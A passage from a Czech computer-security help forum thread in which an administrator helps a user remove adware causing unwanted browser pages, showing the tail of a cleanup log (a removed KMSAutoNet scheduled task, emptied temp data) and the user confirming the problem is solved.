HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8C132DA4-B8DB-4D9E-9528-97A2A24A17D3} => key removed successfully
C:\Windows\System32\Tasks\KMSAutoNet => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\KMSAutoNet => key removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 6853571 B
Java, Flash, Steam htmlcache => 33096430 B
Windows/system/drivers => 40622 B
Edge => 0 B
Chrome => 7013417 B
Firefox => 0 B
Opera => 271863258 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 16802 B
systemprofile32 => 33253 B
LocalService => 0 B
NetworkService => 13294 B
CAM => 35796340 B
postgres => 230538 B
vaclav => 0 B
ReportServer$HORRY => 0 B
MSSQLFDLauncher$HORRY => 0 B
MSSQL$HORRY => 0 B
ReportServer => 0 B
MSSQLFDLauncher => 0 B
MSSQLSERVER => 0 B
Classic .NET AppPool => 0 B
DefaultAppPool => 0 B

RecycleBin => 0 B
EmptyTemp: => 346.5 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 15:45:30 ====
Nahoru
Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118251
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:
Kontaktovat uživatele Rudy

Re: Otevírání nevyžádaných stránek v prohlížeči

#10 Příspěvek od Rudy »

Smazáno. Nastala nějaká změna?
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Nahoru
veny
Návštěvník
Návštěvník
Příspěvky: 25
Registrován: 27 srp 2006 21:27

Re: Otevírání nevyžádaných stránek v prohlížeči

#11 Příspěvek od veny »

psal jsem už v předešlém příspěvku

vše jede jak má

ještě jednou děkuji moc :thumbsup: :thumbsup:
Nahoru
Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118251
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:
Kontaktovat uživatele Rudy

Re: Otevírání nevyžádaných stránek v prohlížeči

#12 Příspěvek od Rudy »

OK, rádo se stalo! :)
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Nahoru
Zamčeno

Zpět na „Řešení problémů, logy“